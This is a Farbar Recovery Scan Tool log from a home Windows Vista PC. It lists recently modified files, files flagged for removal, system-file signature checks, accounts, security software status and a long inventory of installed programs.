2016-11-04 08:57 - 2009-04-16 09:15 - 00000848 _____ C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-598873941-3244639055-2830076859-1000.job
2016-11-04 08:57 - 2006-11-02 06:01 - 00032552 _____ C:\Windows\Tasks\SCHEDLGU.TXT
2016-11-04 08:57 - 2006-11-02 06:01 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2016-11-04 08:57 - 2006-11-02 05:47 - 00003696 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-1.C7483456-A289-439d-8115-601632D005A0
2016-11-04 08:57 - 2006-11-02 05:47 - 00003696 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-0.C7483456-A289-439d-8115-601632D005A0
2016-11-03 16:56 - 2006-11-02 03:22 - 07077888 _____ C:\Windows\system32\config\default_previous
2016-11-03 16:56 - 2006-11-02 03:22 - 00262144 _____ C:\Windows\system32\config\security_previous
2016-11-03 16:31 - 2007-12-16 14:12 - 00000000 ____D C:\Windows\pss
2016-11-03 15:02 - 2007-12-17 16:46 - 00000000 ____D C:\Program Files\Canon
2016-11-03 15:02 - 2007-11-27 01:48 - 00000000 ___HD C:\Program Files\InstallShield Installation Information
2016-11-03 14:56 - 2008-03-16 11:12 - 00000000 ____D C:\Users\Pat\AppData\Local\Yahoo
2016-11-03 14:56 - 2007-11-27 02:11 - 00000000 ____D C:\ProgramData\YAHOO
2016-11-03 14:56 - 2007-11-27 02:09 - 00000000 ____D C:\Program Files\Yahoo!
2016-11-03 14:52 - 2008-08-28 11:36 - 00000000 ____D C:\Users\Pat\AppData\Roaming\Yahoo!
2016-11-03 14:52 - 2008-08-28 11:36 - 00000000 ____D C:\ProgramData\Yahoo!
2016-11-03 14:52 - 2006-11-02 05:37 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games
2016-11-03 14:51 - 2010-08-23 09:33 - 00000000 ____D C:\Program Files\Windows Live
2016-11-03 12:02 - 2007-12-14 11:14 - 00000000 ____D C:\Program Files\Citrix
2016-11-03 11:57 - 2007-11-27 02:13 - 00000000 ____D C:\Program Files\Dell
2016-11-03 11:53 - 2007-12-13 14:31 - 00000000 ____D C:\Users\Pat\AppData\Local\Google
2016-11-03 11:25 - 2007-12-21 17:24 - 00000000 ____D C:\ProgramData\Lavasoft
2016-11-03 11:25 - 2007-12-21 17:24 - 00000000 ____D C:\Program Files\Lavasoft
2016-11-03 05:53 - 2011-01-31 11:26 - 00000680 _____ C:\Users\Pat\AppData\Local\d3d9caps.dat
2016-11-03 05:00 - 2016-09-22 05:22 - 00000000 ____D C:\Users\Pat\AppData\Local\d102cc
2016-11-02 06:16 - 2006-11-02 05:37 - 00000000 ____D C:\Windows\DigitalLocker
2016-11-01 18:39 - 2014-04-28 09:00 - 00011183 _____ C:\Users\Pat\Desktop\JRT.txt
2016-11-01 16:52 - 2014-04-28 08:39 - 00000000 ____D C:\AdwCleaner
2016-11-01 15:31 - 2006-11-02 03:33 - 00759582 _____ C:\Windows\system32\PerfStringBackup.INI
2016-11-01 11:35 - 2007-12-13 18:58 - 00000000 ____D C:\Windows\Minidump
2016-11-01 11:35 - 2006-11-10 06:22 - 00000000 ____D C:\Windows\Panther
2016-11-01 11:35 - 2006-11-02 04:18 - 00000000 ____D C:\Windows\ModemLogs
2016-10-27 18:22 - 2009-10-02 23:31 - 00407720 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe
2016-10-27 11:03 - 2007-11-27 01:45 - 00000012 _____ C:\Windows\bthservsdp.dat
2016-10-26 16:01 - 2013-03-11 16:11 - 00796352 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerApp.exe
2016-10-26 16:01 - 2013-03-11 16:11 - 00142528 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerCPLApp.cpl
2016-10-26 16:01 - 2007-11-27 01:44 - 00000000 ____D C:\Windows\system32\Macromed
2016-10-26 00:40 - 2014-10-03 14:40 - 00000399 _____ C:\Users\Pat\AppData\Roaming\WB.CFG
2016-10-20 15:44 - 2016-02-01 17:55 - 00034817 _____ C:\Users\Pat\Documents\Documents\Documents\Actual vs. Budget Jan 2016.xlsx
2016-10-20 15:44 - 2014-10-28 15:18 - 00020975 _____ C:\Users\Pat\Documents\Documents\Documents\MSSL Check Book.xlsx
 
==================== Files in the root of some directories =======
 
2011-07-04 14:12 - 2011-07-04 14:14 - 0428664 _____ (OpenOffice                                                  ) C:\Program Files\OpenOffice Downloader.exe
2011-07-04 14:12 - 2011-07-04 14:18 - 158067944 _____ () C:\Program Files\OpenOffice.exe
2009-08-20 16:20 - 2009-12-05 06:09 - 8653312 _____ (Dell, Inc.                                                   ) C:\Users\Pat\AppData\Roaming\DataSafeDotNet.exe
2009-11-11 00:30 - 2009-11-11 00:30 - 8346560 _____ (Dell, Inc.                                                   ) C:\Users\Pat\AppData\Roaming\DataSafeDotNet_AVG_RESTORED.exe
2008-04-24 09:49 - 2008-08-22 17:38 - 0000235 _____ () C:\Users\Pat\AppData\Roaming\devices.xml
2016-09-06 13:48 - 2016-09-06 13:48 - 0000370 _____ () C:\Users\Pat\AppData\Roaming\mplex-log.log
2016-09-06 13:28 - 2016-09-06 13:54 - 0000860 _____ () C:\Users\Pat\AppData\Roaming\PPTConverter.log
2008-04-24 09:49 - 2008-08-22 17:38 - 0000012 _____ () C:\Users\Pat\AppData\Roaming\settings.xml
2010-10-13 10:38 - 2009-03-02 17:48 - 0076407 _____ () C:\Users\Pat\AppData\Roaming\Smiley.ico
2014-10-03 14:40 - 2016-10-26 00:40 - 0000399 _____ () C:\Users\Pat\AppData\Roaming\WB.CFG
2011-01-31 11:26 - 2016-11-03 05:53 - 0000680 _____ () C:\Users\Pat\AppData\Local\d3d9caps.dat
2007-12-13 14:41 - 2016-06-23 17:40 - 0155648 _____ () C:\Users\Pat\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2014-10-10 00:40 - 2014-12-17 01:40 - 0000010 _____ () C:\Users\Pat\AppData\Local\DSI.DAT
2013-02-22 13:57 - 2013-02-22 13:57 - 0000057 _____ () C:\ProgramData\Ament.ini
2008-04-24 09:15 - 2009-07-04 05:24 - 0001907 _____ () C:\ProgramData\hpzinstall.log
2016-08-12 09:37 - 2016-08-12 09:37 - 0005116 _____ () C:\ProgramData\rxsmznjf.zcp
 
Files to move or delete:
====================
C:\Users\Pat\hpothb07.dat
C:\Users\Public\FastBrowserURLDownload.exe
 
 
Some files in TEMP:
====================
C:\Users\Pat\AppData\Local\Temp\libeay32.dll
C:\Users\Pat\AppData\Local\Temp\msvcr120.dll
C:\Users\Pat\AppData\Local\Temp\sqlite3.dll
 
 
==================== Bamital & volsnap ======================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2016-11-04 09:31
 
==================== End of FRST.txt ============================
 
 
Additional scan result of Farbar Recovery Scan Tool (x86) Version: 03-11-2016
Ran by Pat (04-11-2016 10:08:08)
Running from C:\Users\Pat\Documents\Documents\Documents\Downloads
Microsoft® Windows Vista™ Home Premium  Service Pack 2 (X86) (2007-11-27 08:36:28)
Boot Mode: Normal
==========================================================
 
 
==================== Accounts: =============================
 
Administrator (S-1-5-21-598873941-3244639055-2830076859-500 - Administrator - Disabled)
Guest (S-1-5-21-598873941-3244639055-2830076859-501 - Limited - Disabled)
Pat (S-1-5-21-598873941-3244639055-2830076859-1000 - Administrator - Enabled) => C:\Users\Pat
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: Microsoft Security Essentials (Enabled - Up to date) {71A27EC9-3DA6-45FC-60A7-004F623C6189}
AS: Microsoft Security Essentials (Enabled - Up to date) {CAC39F2D-1B9C-4A72-5A17-3B3D19BB2B34}
AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
 
==================== Installed Programs ======================
 
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
1.0 (HKLM\...\The Tetris Game_is1) (Version:  - www.thetetrisgame.com)
Adobe Flash Player 23 ActiveX (HKLM\...\Adobe Flash Player ActiveX) (Version: 23.0.0.205 - Adobe Systems Incorporated)
Adobe Flash Player 23 NPAPI (HKLM\...\Adobe Flash Player NPAPI) (Version: 23.0.0.205 - Adobe Systems Incorporated)
Adobe Reader X (10.1.16) (HKLM\...\{AC76BA86-7AD7-1033-7B44-AA1000000001}) (Version: 10.1.16 - Adobe Systems Incorporated)
Adobe Shockwave Player (HKLM\...\Adobe Shockwave Player) (Version: 11 - Adobe Systems, Inc.)
Amazon Music (HKU\S-1-5-21-598873941-3244639055-2830076859-1000\...\Amazon Amazon Music) (Version: 4.3.2.1367 - Amazon Services LLC)
AnyTrans 4.7.5 (HKLM\...\{E580ED1F-AAF8-4F7E-B174-54BFA2B94E0B}}_is1) (Version: 4.7.5 - iMobie Inc.)
Apple Application Support (HKLM\...\{A83279FD-CA4B-4206-9535-90974DE76654}) (Version: 2.1.5 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{35B91753-5789-4517-9CF1-2CCE3A8CF4F1}) (Version: 2.0.0.33 - Apple Inc.)
Apple Software Update (HKLM\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
ATI Catalyst Control Center (HKLM\...\{055EE59D-217B-43A7-ABFF-507B966405D8}) (Version: 1.007.2007.0318 - )
Backgammon Classic 7.1 (HKLM\...\Backgammon Classic_is1) (Version:  - Microsys Com Ltd.)
BlackBerry Desktop Software 4.3 (HKLM\...\BlackBerry_{0D048BE8-AE02-4CB5-A428-616B9848E4A7}) (Version: 4.3.0.17 - Research In Motion Ltd.)
BlackBerry Desktop Software 4.3 (Version: 4.3.0.17 - Research In Motion Ltd.) Hidden
Bridge From Special K (C:\Program Files\Bridge From Special K\) (HKLM\...\ST6UNST #2) (Version:  - )
Bridge From Special K (HKLM\...\ST6UNST #1) (Version:  - )
BufferChm (Version: 100.0.170.000 - Hewlett-Packard) Hidden
Callarama System (HKLM\...\ST6UNST #3) (Version:  - )
Camera Access Library (Version: 8.0.0.21 - Canon) Hidden
Camera Support Core Library (Version: 7.3.0.4 - Canon) Hidden
Camera Window DS (Version: 5.3.1 - Canon) Hidden
Camera Window DVC (Version: 5.4.4 - Canon) Hidden
Camera Window DVC (Version: 6.0 - Canon) Hidden
Camera Window MC (Version: 6.0 - Canon) Hidden
Canon Camera Access Library (HKLM\...\InstallShield_{901F8ED7-13E8-43EF-B738-2FE89B0588EB}) (Version: 8.0.0.21 - Canon)
Canon Camera Support Core Library (HKLM\...\InstallShield_{A1D0D14A-B776-4907-BC00-5149F2298086}) (Version: 7.3.0.4 - Canon)
Canon Camera Window DC_DV 5 for ZoomBrowser EX (HKLM\...\InstallShield_{A2EB8F2E-6D9B-4F8B-96EB-F976D33F416F}) (Version: 5.4.4 - Canon)
Canon Camera Window DC_DV 6 for ZoomBrowser EX (HKLM\...\InstallShield_{50E25180-3BDC-4B6D-80A2-3F1F0C9CF39D}) (Version: 6.0 - Canon)
Canon Camera Window DSLR 5 for ZoomBrowser EX (HKLM\...\InstallShield_{0A146245-DB79-4197-BF5D-FE1A699A2CC7}) (Version: 5.3.1 - Canon)
Canon Camera Window MC 6 for ZoomBrowser EX (HKLM\...\InstallShield_{6C3A75A6-9A90-44A3-A703-82AC1EA6A85D}) (Version: 6.0 - Canon)
Canon MovieEdit Task for ZoomBrowser EX (HKLM\...\InstallShield_{4DBBF091-FACD-422C-B43C-786335BD5398}) (Version: 2.1.0.20 - Canon)
Canon PhotoRecord (HKLM\...\{BBBC2B89-E193-4348-A83C-C8DD8210A4AC}) (Version: 02.02.03002 - Cisra)
Canon RAW Image Task for ZoomBrowser EX (HKLM\...\InstallShield_{BAA43DA2-B6C5-46EC-B163-0E8EEAF975A4}) (Version: 2.2 - Canon)
Canon Utilities PhotoStitch 3.1 (HKLM\...\InstallShield_{874E44F3-B9A7-4AA1-B4BA-83E5684ED9C6}) (Version: 3.1.16 - Canon)
Canon ZoomBrowser EX (E) (HKLM\...\{C1D76D7A-F3BB-47EA-A746-5B1E2FFC1DF2}) (Version: 5.05.0000 - Canon)
Carbonite (HKLM\...\{E711D777-58CF-4F58-86D8-AD86FF36686C}) (Version: 5.8.9 build 6256 (May-19-2016) - Carbonite)
ccc-core-static (Version: 0108.2146.2565.38893 - ATI) Hidden
CCleaner (HKLM\...\CCleaner) (Version: 5.23 - Piriform)
Chinese Simplified Fonts Support For Adobe Reader X (HKLM\...\{AC76BA86-7AD7-2447-0000-A00000000003}) (Version: 10.0.0 - Adobe Systems Incorporated)
Citrix Online Launcher (HKLM\...\{F17C3DC2-2ACA-4B0E-BDBF-ACE61B14E7CD}) (Version: 1.0.183 - Citrix)
Click 2 Crop 4.8 (HKLM\...\Click 2 Crop_is1) (Version:  - Boris A. Glazer)
Conexant D850 PCI V.92 Modem (HKLM\...\CNXT_MODEM_PCI_VEN_14F1&DEV_2F20&SUBSYS_200F14F1) (Version:  - )
D3DX10 (Version: 15.4.2368.0902 - Microsoft) Hidden
datasafeupdate (HKLM\...\{1D0BD79C-F8DA-4803-9C23-55480D769704}) (Version: 1.00.0000 - Dell, Inc.)
Dell DataSafe Online (HKLM\...\{13766F76-6C8C-4E57-A9F3-3212D1C6E0D1}) (Version: 1.2.0009 - Dell, Inc.)
Dell Getting Started Guide (HKLM\...\{7DB9F1E5-9ACB-410D-A7DC-7A3D023CE045}) (Version: 1.00.0000 - Dell Inc.)
Dell Support Center (Support Software) (HKLM\...\{E3BFEE55-39E2-4BE0-B966-89FE583822C1}) (Version: 2.2.09085 - Dell)
DellSupport (HKLM\...\{7EFA5E6F-74F7-4AFB-8AEA-AA790BD3A76D}) (Version: 6.0.3075 - Dell)
DeLorme Street Atlas USA 2008 Plus (HKLM\...\{3F7D7F4A-6F41-4FCE-80B3-DB4210FA01EA}) (Version: 1.0.2008 - DeLorme Publishing, Inc.)
Destination Component (Version: 100.0.0.0 - Hewlett-Packard) Hidden
DeviceDiscovery (Version: 100.0.190.000 - Hewlett-Packard) Hidden
DeviceManagementQFolder (Version: 1.00.0000 - Hewlett-Packard) Hidden
Digital Line Detect (HKLM\...\{E646DCF0-5A68-11D5-B229-002078017FBF}) (Version: 1.21 - BVRP Software, Inc)
Dirt Track Racing 2 (HKLM\...\Dirt Track Racing 2) (Version:  - )
DocMgr (Version: 100.0.201.000 - Hewlett-Packard) Hidden
DocProc (Version: 12.0.0.0 - Hewlett-Packard) Hidden
DocProcQFolder (Version: 1.00.0000 - Hewlett-Packard) Hidden
EarthLink Setup Files (HKLM\...\{5E68BB65-4059-4FE5-AAC4-0CD1D79BBDE2}) (Version: 2005.2.178.0.2.2 - EarthLink, Inc.)
Elevated Installer (Version: 2.4.6.0 - Garmin Ltd or its subsidiaries) Hidden
eSupportQFolder (Version: 1.00.0000 - Hewlett-Packard) Hidden
Farkle 3.0.13.10 (HKLM\...\Farkle_is1) (Version:  - )
Garmin Express (HKLM\...\{29382fb9-c7e9-45a6-a223-db732d64f6a6}) (Version: 2.4.6.0 - Garmin Ltd or its subsidiaries)
Garmin Express (Version: 2.4.6.0 - Garmin Ltd or its subsidiaries) Hidden
Garmin Express Tray (Version: 2.4.6.0 - Garmin Ltd or its subsidiaries) Hidden
Google Chrome (HKU\S-1-5-21-598873941-3244639055-2830076859-1000\...\Google Chrome) (Version: 49.0.2623.112 - Google Inc.)
Google Desktop (HKLM\...\Google Desktop) (Version: - - Google)
Google Earth (HKLM\...\{817750FA-EC6A-485D-9901-0683AE6FFDF1}) (Version: 7.1.5.1557 - Google)
Google Toolbar for Internet Explorer (HKLM\...\{2318C2B1-4965-11d4-9B18-009027A5CD4F}) (Version: 7.5.7619.1252 - Google Inc.)
Google Toolbar for Internet Explorer (Version: 1.0.0 - Google Inc.) Hidden
Google Update Helper (Version: 1.3.22.3 - Google Inc.) Hidden
Google Update Helper (Version: 1.3.31.5 - Google Inc.) Hidden
Google Updater (HKLM\...\Google Updater) (Version: 2.4.2432.1652 - Google Inc.)
GPBaseService (Version: 100.0.187.000 - Hewlett-Packard) Hidden
Hoyle Card Games 2005 (HKLM\...\{B44AA698-B221-4B3B-8CA5-E65EF6A5AF26}) (Version: 1.2.0.0 - Encore, Inc.)
HP Document Manager 1.0 (HKLM\...\HP Document Manager) (Version: 1.0 - HP)
HP Imaging Device Functions 10.0 (HKLM\...\HP Imaging Device Functions) (Version: 10.0 - HP)
HP Memories Disc (HKLM\...\{B376402D-58EA-45EA-BD50-DD924EB67A70}) (Version: 1.0.4.805 - Hewlett-Packard Company)
HP Photo Creations (HKLM\...\HP Photo Creations) (Version: 1.0.0.7702 - HP)
HP Photosmart 6520 series Basic Device Software (HKLM\...\{8B0F2985-0468-4770-8CB7-6592A7639BAE}) (Version: 28.0.989.0 - Hewlett-Packard Co.)
HP Photosmart 6520 series Help (HKLM\...\{D3293275-1002-41F5-BC37-099B4251FF5B}) (Version: 28.0.0 - Hewlett Packard)
HP Photosmart 6520 series Product Improvement Study (HKLM\...\{AE6A0886-51FE-4B52-95BB-33281A80CD6D}) (Version: 28.0.989.0 - Hewlett-Packard Co.)
HP Photosmart Essential 2.5 (HKLM\...\HP Photosmart Essential) (Version: 2.5 - HP)
HP Smart Web Printing (HKLM\...\HP Smart Web Printing) (Version: 3.5 - HP)
HP Solution Center 10.0 (HKLM\...\HP Solution Center & Imaging Support Tools) (Version: 10.0 - HP)
HP Update (HKLM\...\{912D30CF-F39E-4B31-AD9A-123C6B794EE2}) (Version: 5.005.002.002 - Hewlett-Packard)
HPProductAssistant (Version: 100.0.170.000 - Hewlett-Packard) Hidden
HPSSupply (Version: 100.0.170.000 - Hewlett-Packard) Hidden
Intel® PRO Network Connections 12.1.11.0 (HKLM\...\PROSetDX) (Version:  - Intel)
Internet Explorer (Enable DEP) (HKLM\...\{a9264802-8a7a-40fe-a135-5c6d204aed7a}.sdb) (Version:  - )
Internet Service Offers Launcher (HKLM\...\{CCFF1E13-77A2-4032-8B12-7566982A27DF}) (Version: 1.00.0000 - Dell Inc.)
inTuneMP3 (HKLM\...\{508BFA95-545E-42A2-8C9D-E531C53C9B79}) (Version: 1.5.0 - W3i Holdings)
IrfanView (remove only) (HKLM\...\IrfanView) (Version:  - )
iTunes (HKLM\...\{EF6C4600-306D-4F6A-A119-C2A877D25B4A}) (Version: 7.7.0.43 - Apple Inc.)
Junk Mail filter update (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Leawo PowerPoint to Video Pro version 2.8.0.0 (HKLM\...\{5D5CB188-F9B1-4103-B2AD-07FB33068377}_is1) (Version: 2.8.0.0 - Leawo Software)
Malwarebytes Anti-Malware version 2.2.1.1043 (HKLM\...\Malwarebytes Anti-Malware_is1) (Version: 2.2.1.1043 - Malwarebytes)
Mesh Runtime (Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Messenger Companion (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Microsoft .NET Framework 3.5 SP1 (HKLM\...\Microsoft .NET Framework 3.5 SP1) (Version:  - Microsoft Corporation)
Microsoft .NET Framework 4.5.2 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.51209 - Microsoft Corporation)
Microsoft Fix it Center (HKLM\...\{B7588D45-AFDC-4C93-9E2E-A100F3554B64}) (Version: 1.0.0100 - Microsoft Corporation)
Microsoft Office 2007 Service Pack 3 (SP3) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}) (Version:  - Microsoft)
Microsoft Office File Validation Add-In (HKLM\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)
Microsoft Office Home and Student 2007 (HKLM\...\HOMESTUDENTR) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Office PowerPoint Viewer 2007 (English) (HKLM\...\{95120000-00AF-0409-0000-0000000FF1CE}) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Security Essentials (HKLM\...\Microsoft Security Client) (Version: 4.10.205.0 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.50709.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053 (HKLM\...\{770657D0-A123-3C07-8E44-1C83EC895118}) (Version: 8.0.50727.4053 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ Run Time  Lib Setup (HKLM\...\{AAF4238F-7C29-451D-9925-C753271A5728}) (Version: 1.0.0 - Microsoft)
Modem Diagnostic Tool (HKLM\...\{F63A3748-B93D-4360-9AD4-B064481A5C7B}) (Version: 1.0.17.8 - Dell)
Move Networks Media Player for Internet Explorer (HKU\S-1-5-21-598873941-3244639055-2830076859-1000\...\Move Networks Player - IE) (Version:  - )
MovieEdit Task (Version: 2.1.0.20 - Canon) Hidden
MSXML 4.0 SP2 (KB936181) (HKLM\...\{C04E32E0-0416-434D-AFB9-6969D703A9EF}) (Version: 4.20.9848.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB941833) (HKLM\...\{C523D256-313D-4866-B36A-F3DE528246EF}) (Version: 4.20.9849.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB954430) (HKLM\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
Music, Photos & Videos Launcher (HKLM\...\{D7769185-9A7C-48D4-8874-5388743A1DE2}) (Version: 1.00.0000 - Dell Inc.)
NetWaiting (HKLM\...\{3F92ABBB-6BBF-11D5-B229-002078017FBF}) (Version: 2.5.44 - BVRP Software, Inc)
OCR Software by I.R.I.S. 10.0 (HKLM\...\HPOCR) (Version: 10.0 - HP)
OGA Notifier 2.0.0048.0 (Version: 2.0.0048.0 - Microsoft Corporation) Hidden
Open Freely (HKLM\...\{1BF14E04-85DE-480C-9A04-EB36744C66C3}_is1) (Version: 1.0 - Download Freely, LLC)
Open Kart (HKLM\...\Open Kart_is1) (Version: 1.0 - GameTop Pte. Ltd.)
OpenOffice (HKLM\...\OpenOffice_is1) (Version: 1.0 - OpenOffice)
OpenOffice.org 3.3 (HKLM\...\{3E171899-0175-47CC-84C4-562ACDD4C021}) (Version: 3.3.9567 - OpenOffice.org)
PhotoRescue Wizard PC 3.2.8.13112 (HKLM\...\PhotoRescue Wizard PC_is1) (Version:  - DataRescue sa/nv)
PhotoStitch (Version: 3.1.16 - Canon) Hidden
Picasa 3 (HKLM\...\Picasa 3) (Version: 3.9 - Google, Inc.)
Product Documentation Launcher (HKLM\...\{89CEAE14-DD0F-448E-9554-15781EC9DB24}) (Version: 1.00.0000 - Dell Inc.)
PSSWCORE (Version: 2.02.0000 - Hewlett-Packard) Hidden
QuickTime (HKLM\...\{7BE15435-2D3E-4B58-867F-9C75BED0208C}) (Version: 7.71.80.42 - Apple Inc.)
Race Cars The Extreme Rally (HKLM\...\Race Cars The Extreme Rally_is1) (Version:  - )
RAW Image Task 2.2 (Version: 2.2 - Canon) Hidden
RealDownloader (Version: 1.3.3 - RealNetworks, Inc.) Hidden
RealNetworks - Microsoft Visual C++ 2008 Runtime (Version: 9.0 - RealNetworks, Inc) Hidden
RealNetworks - Microsoft Visual C++ 2010 Runtime (Version: 10.0 - RealNetworks, Inc) Hidden
RealPlayer (HKLM\...\RealPlayer 16.0) (Version: 16.0.3 - RealNetworks)
Realtek High Definition Audio Driver (HKLM\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version:  - )
RealUpgrade 1.1 (Version: 1.1.0 - RealNetworks, Inc.) Hidden
Roxio Creator Audio (HKLM\...\{83FFCFC7-88C6-41c6-8752-958A45325C82}) (Version: 3.3.0 - Roxio)
Roxio Creator BDAV Plugin (HKLM\...\{880AF49C-34F7-4285-A8AD-8F7A3D1C33DC}) (Version: 3.3.0 - Roxio)
Roxio Creator Copy (HKLM\...\{619CDD8A-14B6-43a1-AB6C-0F4EE48CE048}) (Version: 3.3.0 - Roxio)
Roxio Creator Data (HKLM\...\{0D397393-9B50-4c52-84D5-77E344289F87}) (Version: 3.3.0 - Roxio)
Roxio Creator DE (HKLM\...\{C8B0680B-CDAE-4809-9F91-387B6DE00F7C}) (Version: 3.3.0 - Roxio)
Roxio Creator Tools (HKLM\...\{0394CDC8-FABD-4ed8-B104-03393876DFDF}) (Version: 3.3.0 - Roxio)
Roxio Express Labeler (HKLM\...\{6675CA7F-E51B-4F6A-99D4-F8F0124C6EAA}) (Version: 2.1.0 - Roxio)
Roxio Update Manager (HKLM\...\{30465B6C-B53F-49A1-9EBA-A3F187AD502E}) (Version: 3.0.0 - Roxio)
Segoe UI (Version: 15.4.2271.0615 - Microsoft Corp) Hidden
Shop for HP Supplies (HKLM\...\Shop for HP Supplies) (Version: 10.0 - HP)
Skins (Version: 0108.2146.2565.38893 - ATI) Hidden
SmartWebPrintingOC (Version: 100.0.189.000 - Hewlett-Packard) Hidden
SolutionCenter (Version: 100.0.175.000 - Hewlett-Packard) Hidden
Sonic Activation Module (Version: 1.0 - Sonic Solutions) Hidden
Spybot - Search & Destroy (HKLM\...\{B4092C6D-E886-4CB2-BA68-FE5A88D31DE6}_is1) (Version: 1.6.2 - Safer Networking Limited)
Spybot - Search & Destroy 1.5.2.20 (HKLM\...\Spybot - Search & Destroy_is1) (Version:  - Safer Networking Ltd.)
Status (Version: 100.0.272.000 - Hewlett-Packard) Hidden
Street Atlas USA 2006 (Version: 1.00.000 - DeLorme) Hidden
Tiger Woods PGA TOUR 2000 (HKLM\...\Tiger Woods PGA TOUR 2000) (Version:  - )
TrayApp (Version: 100.0.170.000 - Hewlett-Packard) Hidden
Update for 2007 Microsoft Office System (KB967642) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version:  - Microsoft)
User's Guides (HKLM\...\{5CD29180-A95E-11D3-A4EB-00C04F7BDB2C}) (Version:  - )
VideoToolkit01 (Version: 100.0.128.000 - Hewlett-Packard) Hidden
VZAccess Manager for RIM (HKLM\...\{02807340-8FA2-44B6-ABA1-E443E4FF0A20}) (Version: 6.9.0 - Smith Micro Software Inc.)
Windows Live Essentials (HKLM\...\WinLiveSuite) (Version: 15.4.3502.0922 - Microsoft Corporation)
Windows Live Mesh ActiveX Control for Remote Connections (HKLM\...\{2902F983-B4C1-44BA-B85D-5C6D52E2C441}) (Version: 15.4.5722.2 - Microsoft Corporation)
Windows Mobile Device Center (HKLM\...\{904CCF62-818D-4675-BC76-D37EB399F917}) (Version: 6.1.6965.0 - Microsoft Corporation)
Windows Mobile Device Center Driver Update (HKLM\...\{E7044E25-3038-4A76-9064-344AC038043E}) (Version: 6.1.6965.0 - Microsoft Corporation)
Xilisoft Audio Converter 6 (HKLM\...\Xilisoft Audio Converter 6) (Version: 6.5.0.20130130 - Xilisoft)
Xilisoft PowerPoint to Video Converter Free (HKLM\...\Xilisoft PowerPoint to Video Converter Free) (Version: 1.1.1.20120601 - Xilisoft)
Yahoo! Browser Services (HKLM\...\Yahoo! Extras) (Version:  - )
Yahoo! Install Manager (HKLM\...\YInstHelper) (Version:  - )
Yahoo! Music Jukebox (HKLM\...\{EC3B8CA2-49B8-4D38-BE9C-ABD0F6029168}) (Version: 2.1.1.013 - Yahoo!)
zoom.us (HKLM\...\{237FB6DF-B351-4567-9226-4CE4A9CBBEA8}) (Version: 0.9 - Zoom Video Communications, Inc.)
 
==================== Custom CLSID (Whitelisted): ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{022105BD-948A-40C9-AB42-A3300DDF097F}\localserver32 -> C:\Users\Pat\AppData\Local\Google\Update\GoogleUpdate.exe (Google Inc.)
